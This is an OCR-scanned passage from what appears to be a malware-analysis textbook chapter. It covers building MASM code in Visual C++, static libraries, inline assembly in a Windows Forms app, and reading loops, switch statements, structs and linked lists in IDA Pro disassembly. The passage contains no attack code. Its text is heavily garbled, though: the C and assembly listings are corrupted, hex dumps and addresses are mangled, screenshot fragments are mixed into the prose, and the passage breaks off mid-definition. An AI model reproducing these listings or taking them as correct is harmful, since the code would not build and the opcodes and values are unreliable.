-Fl generates a .1st listing file. —Zi is for 
symbolic debug information. —c is for assembling 
without linking. 


TIP 


There is no 1 (one) symbol and all are capital Is (pronounced eye) and 
lowercase Is (pronounced el). 





Then, type $(IntDir)\$ (InputName) .obj in the 
Outputs box. 


In more recent versions of VC++ (2008 and 
above), you can configure the following by right- 
clicking on project, selecting Build 
Dependencies | Build Customizations | check 


masm. Then, right-click on the .asm file and 
change Item Type to Microsoft Macro 
Assembler | Compile. 


A basic "Hello World!" program can be compiled 
to check whether your MASM syntax is 
successfully compiling in the current setup. As 
you will be using the user mode debugger, 
OllyDbg, in the later chapters, you are advised to 
explore the View | Source option that allows the 
use of debugging with disassembly. If the symbol 
files are available on a debug build, the hint pane 
in OllyDbg will also display the source code 
pertaining to the current disassembly line. This is 
an essential feature that most debuggers 
support, including Windbg, Microsoft's kernel 
debugger: 


-Listall 
. 386 
-model flat,c 
printf PROTO argl: Ptr Byte, 
printlist:VARARG 
.data 
Msg byte "Hello World!", OAh,0 
.code 
main proc 
INVOKE printf, ADDR Msg 

ret 
main endp 

end 


To set a breakpoint in the debugger while the 
program is executing, you can insert int 3 in any 
part of the code between main proc and main 
endp to instruct the debugger to break at the 
OxCC opcode before it is assembled. This will 
enable you to SINGLE STEP (F11) the code within 
Visual C++ without getting into keyboard input 
code or macros at this point, which is useful if 
you want to see line-by-line execution in the IDE 
without the console window closing. 


If you are acquainted with Win32 programming, 
you can also use API calls to programmatically 
insert breakpoints using kernel32 ! DebugBreak 
and ntdll!DbgBreakPoint, which are the user 
mode and kernel mode versions of the 
breakpoint API calls. 


Note the .Listall directive at the beginning of 
the source code, which creates a listing file of the 
assembler-generated code of the high-level 
directives, will also be seen. This will be found in 
the project folder as a file with a . lst extension. 
This can be opened inside VC++ by pressing Ctr/ 
+ Oor from the File | Open | File menu item. 
The other benefit of the listing file is that the 
assembled opcodes are also displayed, which can 
be used for offline study. 


Study the following listing file excerpt text and 
investigate the different sections: 


Microsoft (R) Macro Assembler Version 
9.00.30729.01 


. 386 

-model flat,c 

printf PROTO argl: Ptr Byte, 
printlist:VARARG 
00000000 .data 
00000000 48 65 6C 6C 6F Msg byte 
"Hello World!", OAh,0 

20 57 GF 7266 


64 21 OA 00 

00000000 .code 
00000000 main proc 
00000000 Ce int 3 
INVOKE printf, ADDR Msg 
0000000E ca ret 
0000000F main endp 
end 


In case you were wondering how these macros 
were used, you Can open any item in the 


Property Pages project and click the downward 
arrow, and if there is an <edit> option, you can 
click it to go to the macros dialog and build the 
macro sequence. You can type in the text box or 
double-click the macro definitions in the list box 
below. You can also search for visual studio 
macros for build commands and properties 
on your favorite search engine. 


To see the various command-line parameters for 
the mL.exe assembler, open Visual Studio 2008 
command prompt from the start menu 
installation folder in Windows and typeml /?. 


Another variant of this method of integrating 
assembly code and C/C++ code is to simply write 
assembly code in a text file, without bothering 
about the .asm extension and include this file in 
Visual Studio by using Add | Existing Item from 
the context menu for the Source Files folder. 
You can add a text file by going to File | New | 
File | General | Text File. Thereafter, right-click 
the .txt file and navigate to the Custom Build 
Step column and type the following: 





Configuration: | Active(Debug) v Platform: Ain v Confguation Manage 
Configuration Properties ml/c/Cx/coff §(InputFileName) 


General Description Performing Custom Build Step 
Custom Build Step Outputs §(InputName).obj 
General Additional Dependencies 














Command Line 
Specifies @ command line forthe custom build step, 














Cancel | Apply 


Note that the filename is used as both the object 
file name and the function name. However, this 
is optional as the defining parameter is the 
function name in the assembly code. To use this 
piece of code in a regular C program, you need to 
insert the following line in the source file before 
main(): 





extern "C" void <function_name/filename> 
(chair *).: 


4 » 


Type the following into a text file in Visual C++ 
and include the file in the solution source files 
folder or add a new file and rename the 


extension to .txt and configure the build step as 
described earlier. ML.exe, which is the assembler, 
does not itself need the extension of .asm and 
can be set to anything: 


/* SpaceCounter.txt 
*Assembly procedure to determine the 
number of spaces and the total length of 
the string*/ 
.586 ; enables assembly 
of non-privileged instructions of 

; 80586 processor 
-model flat, C ; Flat memory model 
of 4GB range with origin 00000000h 

; denotes size of 
code and data pointers 

; Language type C, 
with cdecl calling convention 


.Stack 1024 s;this is the default 
value of the stack segment size 
.code ; indicates start of 


the code segment 

public SpaceLenCounter 
SpaceLenCounter proc uses 
esi,coolString:ptr , spacesCount:ptr, 
totalLength:ptr 

pushad 
mov esi,coolString 
mov ecx,0 ; initialize the 
counters to zero 
mov ebx,0 
push totalLength ; save the addresses 
to stack 
push spacesCount 
Li 
mov al, [esi] 
cmp al, 20h ; check for the ASCII 
space hexadecimal value 
jnz next 
inc ecx ; spaces counter increment 
next: 
inc esi 
inc ebx ; character counter 
increment 
mov eax,0 
cmp [esi],eax ; check for null character 
or end of string (character array) 
jnz LL 
pop eax ;restore the address of 
spaceCount variable 
pop edx ;restore the address of 


totalLength variable 


mov [eax],ecx ; copy the value in ecx 
to the address referenced by eax 

mov [edx],ebx ; copy the value in ecx 
to the address referenced by ebx 

popad 

Ret 

SpaceLenCounter endp 

End 


In the main .cpp file, you can type the following: 


#include "stdafx.h" 
#include <stdio.h> 
#include <conio.h> 


extern "C" void SpaceLenCounter (char 
= nie a nie 


char coolString[48] = "How many spaces in 
this text and what length???"; 

//can be replaced with user input 
functions from standard library 


int main(int argc, char* argyv(]) 
{ 
Printh (ess. \ino, coolString): 
char *p=coolString; 
int totalSpaces=0; 

int 
LengthOfSt ring=0;SpaceLenCounter(coolStri 
ng,&totalSpaces, &lengthOfString) ; 
printf ("Total Spaces = %d & Length of 
String = %d\n", totalSpaces, 
lengthOfString) ; 
_getche(); 
return 0; 


} 


The output is as follows: 


How many spaces in this text and what length??? 
[otal Spaces = 8 & Length of String = 4? 





The extern "C" keyword adds the function that 
is defined externally as a C function. The object 
code and then the subsequent linking are 
handled by the Visual C++ build environment, 


which requires you to configure the build steps 
prior to compilation. 


Here, in the C source, we pass the address of the 
variables and a pointer-to character array 
(pointer to a pointer or pointer to 
array[0]), and hence, the data types in the 
function definition have the ptr data type. 


Consider the assembly code for 
SpaceLenCounter: 


public SpaceLenCounter 
SpaceLenCounter proc uses esi, 
COOLUString: pen Xiptr,. viper 
mov esi,coolString 


You have to declare SpaceLenCounter() as a 
public procedure so that it can be linked by the 
compiler as is visible in the global namespace: 


SpaceLenCounter proc uses esi, 
coolString: pir ; xiptr, yiptr 


Is the PROC directive with the optional uses 
parameter for register allocation and the three 
arguments passed as per definition? The 
arguments are passed in the <identifier>: 
<type> format. 


The pushad and popad instructions save and 
restore the stack state as the execution enters 
the function call. Eight general registers are 
pushed to the stack taking a DWORD (d in 
pushad for DWORD) each. Their counterparts for 
the EFLAGS register are pushfd and popfd. 


ptr is essentially a 32-bit unsigned value as it 
denotes the memory addresses. 


The rest of the assembly code is self-explanatory 
as per the comments. Try to see whether you can 
implement it in another manner. 


The static library generator 


You can build a .lib library file from the 
assembly code file given earlier. By the current 
configuration, you already have a .obj file in the 
project folder. You have noted that the PUBLIC 
directive was used in the assembly code to 
expose function parameters to the global 
namespace. You have also noted that the EXTERN 
directive is to be used in the calling program, 
here, in the C language source code. A library file 
is a binary format that encapsulates an assembly 
code-assembled object file and builds a unit that 
can be reused and shared in other projects as 
and when needed with minimal recoding. If 
regular assembly programming is to be done, 
then the library .lib files are of immense value. 


This is known as static linking wherein the 
function code is extracted from the library 
module and compiled in the main binary as part 
of the final executable. The other method is 
dynamic linking where the dynamic link library is 
dynamically linked and the import tables and 
export tables are filled by the loader during 
runtime process mapping with the addresses of 
the library functions. These jump thunk tables 
are then used by the code during runtime to 
access the invoked function entry points. For 
most functions that return a value, EAX is the 
register. By convention, the return values are fed 
back after function exit. 


To build a library file from the object file, you 
have to invoke LIB. exe from Visual Studio 


Command. If not already present, you can use 
ml.exe /c /Cx /Coff <.asm file> to generate 
the object file for that particular assembly source 
only. Go to the prompt and type LIB 
<objectfile.obj> to generate the library file 
from the object file. 


Thereafter, you have to include this library in 
your VC++ project. To do so, you have to right- 
click on the project name and open Properties, 
navigate to Linker | Additional Dependencies, 
and type "$(InputDir)SpaceCounter. lib”. 


Remember to enter the line with quotation marks 
so that VC++ does not complain about not 
finding the Lib file. Use the name of the lib file 
that you have named: 


Configuration: —Active(Debug) ¥ Platform; Active(Win32) v Coniguation Manage 


Common Properties “§(InputDir)SpaceCounter.ib" 


Configuration Properties Ignore All Default Libraries No 
Genera Ignore Spectfic Library 
Debugging Module Defnton il 


C/C++ Add Module to Assembly 
Linker 








Embed Managed Resource File 
General 


Input 
Manifest File 
Debugging 
System 
Optimization 
Embedded IDL 
Advanced 
Command Line 
Manifest Tool 
XML Document Generator 


Force Symbol References 
Delay Loaded DLLs 
Assembly Link Resource 


Browse Information 
Build Events 


Custom Build Step Additonal Dependencies 
Species additional items to add to the lnk line (ex: kemnel32\ib); configuration spectfic, 




















Cancel Apply | 


In the new source text, include the preceding 
extern "C" statement as described and press F5 
to compile, link, and run the new project. 


In Visual Studio Command Prompt, you can 
type dumpbin /all SpaceCounter. lib to 
familiarize yourself with the binary format and 
attributes of particular interest (as mentioned in 
the following excerpt). You first have to set the 
current path to the path of the library file; else, 
you have to feed the full path (~ shortening of 
paths also works in Windows). Study the output; 
notice how the public symbols are exposed. Also 
notice the binary format, which is a version of the 
PE/Coff (common object file format) format for 


Windows. You will see the various section names 
and their section headers. The file header looks 
as it should for a typical 32-bit PE binary; here, 
the binary has 4 sections and is x86 compatible. 
RAW DATA #1 is the opcode sequence for the 
assembly code in the hexadecimal format. 
.debug$S is the section name for debug symbols, 
with RAW DATA #4 giving the hex dump view of 
the debug strings. 


You can download the PEView tool and open the 
lib file in it to see a more comprehensive and 
consolidated view of the entire file structure in 
hexadecimals, including the parsed headers. 


Let us compile the project with the library file to 
see how the static linking takes place. Open the 
executable in OllyDbg. The debugging details will 
be covered later on, but as a starter, you can 
look for the following code sequence inside 
OllyDbg. 


Right-click in the main disassembly window to 
get to the context menu, and choose Search For 
| Binary String or press Ctr/+ B. In the modal 
dialog box, type the following in the HEX box: 55 
8B EC 56 8B 75 08 


You have just typed the function prologue and 
some more opcodes from the function. The 
sequence 8B 75 08 moves the first argument 
value, which is a pointer to a character array to 
ESI. The number appended to the box name is 
the length of the hexadecimal string in bytes. 
Keep the Entire block option checked. 


x OllyDbq - libtest.exe - [CPU - main thread, module libtest E 























MV Entire block 


MV Case sensitive 





You should be reaching an address in the binary 
where the statically linked function assembly 
code is compiled in the preceding binary. Note 
that the process memory addresses might be 
different in your system. 


Configuration:  Active(Debug) ¥ Platform:  Active(Win32) v Configuration Manager. 





Common Properties B General 
Framework and References | Output Directory §(SolutionDir)${ConfigurationName) 
Configuration Properties Intermediate Directory §(ConfigurationName) 
General Extensions to Delete on Clean *oby iets” th tlh" tmp* rsp*,pgcr* pga" metas 
Debugging Build Log file Snir) BuidLog htm 


CiC++ Inherited Project Propety Sheets 
Linker 


Enable Managed Incremental Build Yes 
General 


(Gl Project Defaults 
Input 


Manifest File 
Debugging 


Configuration Type Application ( exe) 

Use of MFC Use Standard Windows Libraries 

Syten Use of ATL Not = ATL 

Ontimiati Character Set Use Unicode Character Set 

ptimization 

Frnbeded IDL OE ENE aids ye) Common Language Runtime Support (/cr 


Advanced Whole Program Optimization No Whole Program Optimization 


Command Line 
Manifest Tool 
Resources 
Managed Resources 


XML Document Generator ae Language Runtime support 
Browse Information 








Specifies whether this configuration supports the Common Language Runtime, This i 
z= incompatible with some other setings, e.g, runtime checks, See help for /clrfamily of C++ co,, 

















You can use the inline assembler along with GUI 
code in Visual Studio so that you get the best of 
both worlds and build software with user 
interactivity and fast optimizations for regions 
where you feel the assembler fits best. While the 
classic use of Win32 API function calls to build a 
Windows form or dialogs using callbacks and 
message queues is well documented in C/C++ 
programming and even x86 assembly code, it is 
important to understand that there are other 
methods that can be leveraged immediately from 
the current setup. This also lets you focus on the 
algorithms rather than spend the time writing 
OS-specific boilerplate code, which can be 


investigated later on if so required. Once you are 
comfortable with the foundations, you can safely 
pursue GDI+ /DirectX/assembly 2D/3D graphics 
programming on your own. 


In Visual C++ 2008, create a CLR-based project 
and choose Windows Forms Application. Give 
a name and click OK. 


You get a plain Windows form in the designer 
view. Press F5 to run the application. Close the 
form after you verify the execution and see how 
the form works by default; see if the minimize, 
maximize, and exit buttons work as expected. 


Open project properties, navigate to 
Configuration Properties | General, and 
change the Common Language Runtime 
Support option to Common Language Runtime 
/clr from /clr:pure. This will ensure that inline 
assembly compiles in the project. The GUI runs in 
a Managed environment called the CLR, which is 
like a bytecode-based machine and executes 
Microsoft Intermediate Language (MSIL) 
pseudo code in .NET technology-based 
applications. This is not like the native instruction 
set of Intel microprocessors but a layer of 
abstraction above that. It eventually is Just-In- 
Time (JIT) compiled to native code. To ensure 
that your inline assembly is compiled properly, 
you have to place your code before all managed 
code in the source file. 


In the designer view, press A/t+ Enterto open 
the Properties Window (View | Other 
Windows | Properties Window) view. In this 
pane, you will see a list of attributes that you can 
set. Toolbox from the View menu (Ctr/+ Alt+ X) 
provides form controls that can be dragged and 


dropped. You can double-click the form itself to 
reach the event handler for the Form1_ Load 
event. 


Drag a label and a button to the form and 
arrange the controls as shown. Use the Properties 
view to change the value of the label text to 
Counter. 


Double-click on the button to create the event 
handler for the button. 


In the source, type the following at the top of the 
file or just after the #pragma directive and the 

namespace definition at the top of the file. Notice 
how these are inside regular function definitions: 


#pragma once 
namespace DEMOGUI { 


uSing namespace System; 

using namespace System: :ComponentModel; 
using namespace System::Collections; 
using namespace System: :Windows::Forms; 
uSing namespace System: :Data; 

using namespace System: :Drawing; 


int increment (int a){ 
—asm { 

lea eax, a 

mov eax, [eax] 

inc eax 

mov a, eax 

is 

return a; 


} 


int compare(int b) { 
int result=0; 
_asm{ 
cmp b,10 
jle ender 
mov result,1 
ender: 
nop 
} 


return result; 


}//.. Skipped managed class declaration 
below 


In the button event handler, type the following: 


static int counter=0; /* initialize a 
static integer variable as a 
counter */ 
private: System: :Void 
buttonl Click(System::Object* sender, 
System::EventArgs* e) { 
System::String* result = 
counter.ToString(); 
counter=increment (counter) ; 
labell->Text=result; 
if (compare(counter) ){ 
counter=0; 
MessageBox: :Show("Rollover at 10"); 
fe 


Press F5 to run the application, and press the 
button to see the counter value incrementing. At 
counter=10, a message box modal dialog shows 
the value 10. The counter is also reset to 0 on 
the next click. 
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If you use keyboard and mouse event handling in 
VC++ with Windows forms along with assembly 
code, as well as the standard C library and the 
C++ STL library among tons of other external 
libraries, you can build any application that you 
can think of, which has user interactivity as well 
as speed and an environment for rapid 
development. 


Code constructs in 
x86 disassembly 


Beyond the fundamentals of computing including 
number systems and Boolean operators, most 
computer programs make use of constructs that 
enable us to convey logic in source code and 
build algorithms that work with and on data 
structures. This section explains the most 
essential language constructs in C that should 
set the tone for how the rest of the book 
progresses. When analyzing malware, much of 
your time will be spent in front of the 
disassembler and debugger, and reading as well 
as writing assembly code will be a routine 
activity. The commonly used code constructs for 
native binary-compiled languages once written to 
source code are digested by the compiler and 
linker to produce the final binary executable. To 
what end the code constructs are compiled is a 
natural point of interest for the analyst. Since 
most of the time, the source code of the malware 
binary is not available, it is mandatory that 
recognizing code constructs in assembly be 
practiced to a good level of understanding. 


Let us look at some code constructs and how 
they look inside the binary when disassembled. A 
lot of startup boilerplate code is inserted into the 
final binary, and hence, our focus for now is on 
the code lines of interest. Various security 
mechanism options and optimizations result in 
quirky looking assembly code of relatively simple 
source code. This will not be a primer on native 
languages such as C nor an in-depth introduction 
to assembly language, but a warm-up session for 


the rest of the book. You are recommended to 
learn C programming if you do not already know 
it. We will discuss the nuts and bolts of assembly 
programming essentials and deciphering high- 
level language constructs from assembly text in 
the chapters ahead, so do not fret if you do not 
get this at this stage. You can always revisit this 
section later on and solidify your understanding 
as you progress with this book. You will focus on 
conditional constructs and data structures such 
as structs and linked lists. Let's see some C/C++ 
in action in Visual Studio 2008 and IDA Pro 6.1. 


The for loop 


Let us look at the for loop: 


#include "stdafx.h" 
#include<conio.h> 


int tmain(int argc, _TCHAR* argv[]) 
‘i 


for (int i=0; i<10 ; i++) { 
PEINERE Sd\no 51): 


i 
getche(); 
return 0; 


Some disassembly excerpts from IDA Pro are as 
follows: 


mov edi,ds: imp printf ; store 
address of printf to edi from imports 

xor esi, esi ; set value of int i=0 
using esi register 


LOOP START: 

push esi ;push the value of 
esi to the stack 

push offset Format ;push the format 
string for printf 

call edie imp printt s-call to printf 


via import table address at edi 


inc esi ; increment 
counter variable at esi by one 

add esp,8 ; restore the call 
stack (clear 2 parameters pushed) 

cmp esi, OAh ;if esi < 10 then 


jump to start of loop label 
jl LOOP START 


The while loop 


Let us look at the while loop: 


int tmain(int argc, _TCHAR* argv[]) 
{ 
int i=0* 
while (true) { 
Printh(Ssd\ iro ,40 4 
it (is=10), 4 
break; 
} 
else { 
++i; 
ai 
} 
getche(); 
return 0; 


This how an IDA Pro listing can look: 


00401015 loc 401015; 

OO401015 46 inc esi 

GONO1016 56 push esi 

OOMOT017 68 FA 20 40 00 push offset Format =; “4d\n" 
HONG1O1C FF D7 call edi ; 

HONGTBIE 83 Ch 08 add esp, 

00401021 83 FE OA cmp esi, 


HO401024 70 EF jl short loc 461015 
0401026 FF 15 AY 20-40 00 call = ds: 

HONOTO2G SF pop edi 

0401020 33 CO xor ax, bax 
OONBTO2F SE pop esi 

00401030 C3 retn 

06401030 endp 





The while loop assembly code is eerily similar to 
that of the for loop; notice how the return 0 
code line is compiled as xor eax, eax. The 
return values of all function calls normally end up 
in the eax register. 


The do-while loop 


Now, let's look at the do-while loop: 


int tmain(int argc, _TCHAR* argv[]) 
{ 
int i=0; 
dof 
print Sd\in 
if (i>=10){ 
break; 
: 
else{ 
++i; 
} 
}while(true) ; 


getche(); 
return 0; 





texts O00 015 
texts O0NdT 5 Loc VMS: 


stents OONN O15 4b 
texts OOM 616 56 


texts OOWOTOT? 08 FA 20 40 00 


texts 00401010 FF D7 
texts OOOIHE 83 C4 08 
text 00401021 83 FE OA 
text: OO4O1N24 70 EF 


text SOOM N26 FF 15 Ab 20 40 00 


stents O001N2C 5F 


stext 00401020 93.00 | 


stext OOM O2F SE 


05] 

051 

offset Format + "Ad\n" 
etl 

0p), 

sl, 
Short Loc 401015 
(5; 

ed 

eax, eak 

05] 


texts O04 O30 03 
Cents 040130 





Notice how jl short loc 401015 implies that 
for the instruction cmp esi, OAh, if the value of 
esi is less than 10 decimal, then redirect the 
control to the instruction at address 0x401015, 
which is inc esi, or increment the value in the 
esi register. Thereafter, the value is pushed to 
the stack as the second parameter and the 
format string to printf as the first parameter, 
and printf is called. The stack is restored as a 


__cdecl call convention as well; note that the 8h 
bytes or 8h/4h = 2 parameter spaces are being 
cleared off the stack. The process repeats till esi 
is greater than or equal to 10, after which 
getche() waits for user input, and then the 
program ends. 


The if-then-else loop 


Next, let us look at the if-then-else loop: 


int tmain(int argc, _TCHAR* argv[]) 
{ 


int i=0; 


1h i 2) a= 2 

start: 

aT == 29) 
Printh( sd as tirue \ne , 1): 
1=9' 

yelse if (i==10) { 
printt(“%sd is true \n",i); 

yelse if (i==11) { 
printt( “sd is true \a", i): 
getche();} 

++i; 

goto start; 


getche(); 
return 0; 





05 
loc 41020; offset Format 5 "4d is true \n" 
cm) ek, edi ; 
jnz — short Loc 40103F esi, 

esp, 

054 

Short start 





054 
0c 4O10IF: offset Format; "4d is true \n" 
cay esh, call edi: 


ne short Loc 401054 esp, 
inc esi 
Short start 

















From the preceding exhibit, the cmp esi, 2 
instruction is evaluated as the zero flag is set or 
not and jnz will evaluate to true if the zero flag 
is not set or esi !=2 and proceeds to the left- 
side graph node to check whether the value of 
esi compares with OAh or 10 decimal. If esi == 2 
from the start: Label, then the string "2 is 
true" is printed. If esi != 10 decimal, then it 
proceeds to check whether esi is equal to 11 
decimal or OxB. If true, getche() waits for user 
input (the Enter key). Notice the inc esi 
instruction in most of the blocks that coincide 
with the ++i source code line. This will eventually 
overflow the data range, the value of esi will 
return to 2, and the loop will start again. Variable 
i is declared as a signed int (implicitly), meaning 
that there will be a negative sequence of 
numbers as well. You can verify this in the 


debugger via the Edit-and-Continue feature in 
VC++ by changing the counter value to 
0x80000000 (-2“ 31) to OXFFFFFFFE (-2) and 
using printf () to see the signed numbers in the 
stdout console. This continues over and over 
again, and you can exit by pressing Ctr/+ Cin 
the console. 


A switch case 


Let us have a look at a switch case: 


int =O 

switch (i){ 

case 1: printf ("1\n");break; 

case 2: printt €'2\n"); break; 
default : printf("default case\n"); 


With compiler optimization enabled for small 
code (/0s in VC++), the code is relatively short 
and the data flow and conditionals are 
precomputed by the compiler. 


TIP 


For more information on this, have a look at this link 
https://msdn.microsoft.com/en-us/library/klack8f1(v=vs.90).aspx. 





. text :00401000 Peo inn 
__cdecl main(int argc, const char **argv, 
const char **envp) 


. text: 00401000 _main 
proc near ; CODE XREE: 
__tmainCRTStartup+10Ap 

. text :00401000 

. text: 00401000 argc 
= dword ptr 4 

. text : 00401000 argv 
= dword ptr 8 

. text: 00401000 envp 


= dword ptr O0Ch 

. text :00401000 
.text:00401000 push 
"default case\n" 
.text:00401005 call 
.text:0040100B add 
.text:0040100E call 


offset Format : 


dss.) impie Dien th 
esp, 4 
ds: imp getche 


.text:00401014 xor eax, eax 
.text:00401016 retn 


The code is quite compact as the compiler has 
precalculated the value of i as 0, and hence, the 
default case is the only case required, with the 
other two cases omitted. The full disassembly 
text is taken from IDA Pro, which is something 
you will have to get used to even as we deal with 
excerpts for now. The various items that you get 
to read in one line from the left are as follows: the 
section name of the current code (referring to the 
PE file), the virtual memory address of the 
process of the current set of opcodes, the 
opcodes represented as a hex sequence in the 
little-endian format, various labels inserted by 
IDA Pro such as variable names and their stack 
offsets, as well as the function names and 
symbol data, and the disassembly text. During 
malware analysis sessions of x86 binaries, 
disassembly is pretty much the main interface 
that you have to work with. 


Now, consider the compiler optimization 
disabled: 


. text :00401000 Hees ie 
__cdecl main(int argc, const char **argv, 
const char **envp) 

. text: 00401000 _main 
proc near ; CODE XREF: 
__tmainCRTStartup+10Ap 

. text: 00401000 

. text :00401000 var 8 
= dword ptr -8 

.text:00401000 i 

= dword ptr -4 

. text: 00401000 argc 
= dword ptr 8 

. text: 00401000 argv 
= dword ptr O0Ch 

. text: 00401000 envp 
= dword ptr 10h 

. text: 00401000 


: 00401000 
00401001 
700401003 
700401006 
:0040100D 
700401010 
700401013 
700401017 
700401019 
:0040101D 
:0040101F 
700401021 


text :00401021 
text :00401021 
loc 401021: ; 
text :00401021 
*1\n" 

. text 00401026 
. text :0040102C 
. text :0040102F 
text :00401031 


. text: 00401031 
. text: 00401031 
loc 401031: ; 
. text: 00401031 
AON 
. text 
text 
«text 
text 


700401036 
:0040103C 
:0040103F 
700401041 


. text :00401041 
. text: 00401041 
loc 401041: ; 
. text: 00401041 
aDefaultCase ; 
. text: 00401046 
. text :0040104C 
. text :0040104F 
. text :0040104F 
loc 40104F: ; 


push ebp 

mov ebp, esp 

sub esp, 8 

mov [ebp+i], 0 

mov eax, [ebptil] 

mov [ebp+var 8], eax 
cmp {ebp+var 8], 1 
jz short loc 401021 
cmp [ebpt+var 8], 2 
jz short loc 401031 
jmp 


short loc 401041 


CODE XREF: _main+17j 


push offset Format . 
call ds: IMnplap int ® 
add esp, 4 

jmp 


short loc 40104F 


CODE XREF: _main+1Dj 


push offset a2 ‘ 
call ds: _imp_ printf 
add esp, 4 

jmp 


short loc 40104F 


CODE XREF: main+1Fj 
push offset 

"default case\n" 

call ds: Imp. iprintt 
add esp, 4 


CODE XREF: _main+2Fj 


Follow the pushed parameter strings to printf 
and try to reconstruct the switch case segments 
from the preceding disassembly: 


mov [ebp+i], 0 


mov eax, [ebpti] 
mov [ebp+var 8], eax 
cmp [ebpt+var 8], 1 


The preceding code sequence has the value 0 
moved to variable i in the stack. From the 
variable offsets at the start of the function, you 
see that i is located at a negative offset from the 
base pointer of the current stack frame, which 
means that it is a local variable. Hence, [ebp+i] 
is also [ebp-4], and the brackets dereference the 
address with 0 that is stored here. This value is 
then copied to eax and moved to the next offset 
for comparisons on the stack at ebp-8, which is 
then compared to 1 and then 2. 


Structs 


Now, let us look at structs: 


#include "stdafx.h" 
#include <conio.h> //requisite VC++ and 
C standard Library 
//headers 
#include <stdlib.h> 
#include <string.h> 


typedef struct sequence { //defining 
the struct 

char * seqname; 

unsigned int range; 

unsigned int fib []; 
//uninitialized array; 

}Seq; 


Seq *ptrSeq; 


//declaring a pointer variable 


/* the Fibonacci sequence function with 
declared pointer variable 
as argument */ 


void fibonacciNumbers(Seq* ptrSeq) { 


(*ptrSeq) .fib[0]=0; 
(*ptrseq). fib[1}=1; 
printf("%d \n",(*ptrSeq).fib[0]); 
printt ("sd \n",.(*ptrseq). fib [a] }e 


for (int i=2; i<ptrSeq->range;it+) { 
ptrSeq->fib[i]=(ptrSeq->fib[i- 
1]+ptrSeq->fib[i-2]); 
printf ("sd \n", (ptrSeq) .fib[i] )+ 
i 


printf("%s \n",ptrSeq->seqname) ; 


} 


int tmain(int argc, _TCHAR* argv[]) 
{ 
ptrSeq=(Seq*)malloc(sizeof (Seq) ); 
ptrSeq->range=15; //user can set 
this to any value 
ptrSeq->seqname= 
(char*)malloc(strlen("Fibonacci")+1); 
strcpy(ptrSeq->seqname,"Fibonacci") ; 


fibonacciNumbers(ptrSeq); //call to 
Fibonacci function 


getchar(); 
return 0; 


} 


If you load the debug build in IDA Pro, you have 
all the symbols needed for the file, which can 
greatly help in any debugging scenario. Symbols 
are in a proprietary database format, *.pdb, for 
the program database, which essentially contains 
name and address pairs to help the debugger 
translate constructs such as function names and 
variable names, and other data structures such 
as Classes. You may need to demangle them by 
using the Options | Demangled Names menu 
and choose Names to get a cleaner set of names 
in place. Name mangling is a compiler-specific 
method to implement features such as 
polymorphism and inheritance in object-oriented 
C++ code, so that the function name remains 
the same even if the signatures are changed. 


The disassembly of the Fibonacci function: 


.text:013F365E mov eax, [ebpt+tptrSeq] 
.text:013F3661 mov dword ptr [eax+8], 
0 

.text:013F3668 mov eax, [ebpt+ptrSeq] 
.text:013F366B mov dword ptr 
[eax+0Ch], 1 

.text:013F3672 mov esi, esp 


Here, we see the base address of the structure 
loaded to eax. You can examine the memory in 
the IDA Hex view and look at the values of 0 and 
1 stored at offset 8h and Ch from the base. You 
can also see the zero-terminated string for 
"Fibonacci" that is at address E77438h. Is not 
the offset stored at the beginning of the 
structure in the little endian order of 38h 74h 
E7h? 


00 02 0@ 20 01 00 0 ed 





.text:013F36AE mov [ebpt+i], 2 


For the preceding instruction, you can see the 
start value of the loop value dereferenced at 
[ebpt+i] set to 2: 


.text:013F36CO mov eax, [ebptptrSeq] 
.text:013F36C3 mov ecx, [ebpti] 
.text:013F36C6 cmp ecx, [eax+4] 


The final count for the loop is OxF, referenced by 
[eax+4] or 15 decimals, which you can see in 
the following memory view. At this point, the 
compare instruction compares between ecx, 


which has the value of 2 and the value at 
[eax+4], which has the value of 15. 





.text:013F36CB mov eax, [ebpti] 
.text:013F36CE mov ecx, [ebpt+ptrSeq] 
.text:013F36D1 mov edx, [ecxteax*4+4] 


» 


Here, the counter from the loop variable is stored 
at eax. 


The base of the structure is stored at ecx. 


[ecx+eax*4+4] refers to the deferenced value at 
the Base + Index * Scale + Displacement of the 
structure. 


Integers have a size of 4 for this program 
environment and hence, are the scale factor to 
the counter variable used as an index to the 
fib[] array in the source code. The 
displacement is an added offset that refers to the 
next element from the current index. This would 
be fib[i-1]. [ecx+eax*4] would then be fib[i- 
2]. Remember that the count subtracted or 
added to an array element moves by the size of 
the data type, hence, the difference of 4: 


.text:013F36CB mov eax, [ebpti] 
.text:013F36CE mov ecx, [ebpt+ptrSeq] 
.text:013F36D1 mov edx, [ecxteax*4+4] 
2 tibiae Ly] 

.text:013F36D5 mov eax, [ebpti] 
.text:013F36D8 mov ecx, [ebp+ptrSeq] 
.text:013F36DB add edx, [ecxteax*4] 


SED thib es?) 


.text:013F36DE mov eax, [ebpti] 
.text:013F36E1 mov ecx, [ebpt+tptrSeq] 
.text:013F36E4 mov [ecxteax*4+8], edx 


Here, [ecx+eax*4+8] denotes the current 
element in the array as per the current index, 
which is fib[i]. This has to be a linear 
arrangement and hence, is right after fib[i-1] 
and hence the 8 as displacement: 


.text:013F36E8 mov esi, esp : 
storing stack pointer for integrity check 
.text:013F36EA mov eax, [ebpti] : 
store current index again to eax 
.text:013F36ED mov ecx, [ebpt+ptrSeq] 
; store the base address of ptrSeq 
.text:013F36F0 mov edx, [ecx+eax*4+8] 


;store fib[i] to edx 

.text:013F36F4 push edx 

.text:013F36F5 push offset Format 
"sd \n" 

.text:013F36FA call ds: Amp printt 

;print out the value 


.text:013F3700 add esp, 8 
; destroy the stack frame 
.text:013F3703 cmp esi, esp 


;check stack integrity 
.text:013F3705 call j___RTC_CheckEsp 


.text:013F370A jmp short loc 13F36B7 
.text:013F36B7 loc 13F36B7: ; COBE 

XREF: fibonacciNumbers( sequence *)+CAj 

.text:013F36B7 mov eax, [ebpti] 

; load counter 

.text:013F36BA add eax, 1 

s;increment counter 

.text:013F36BD mov [ebpt+i], eax 

; store back to the counter stack 


variable 


from here moving on to 013F36COh at the 
top of the loop. 


Linked lists 


Linked lists are an essential data structure used 
by the Windows OS internally to manage system 


data structures such as heaps. Linked lists are 
composed of nodes that store the data to be 
referenced and links (forward/backward pointers) 
that point to the address of the next or the 
previous node in the chain-like structure. There 
are three main types of linked lists given in the 
following exhibit—a single-linked list, circular- 
linked list, and double-linked list. The head and 
tail members implicitly point to the head and the 
tail, respectively. 





SINGLE-LINKED LIST 








DOUBLE*LINKED LIST 








Let us write a simple single-linked list as an 
example and understand how it functions behind 
the scenes. We will define some data structures 
and then write some methods to work on them: 


#include "stdafx.h" 
#include <conio.h> 
#include <stdlib.h> 
#include <string.h> 


typedef struct node { 


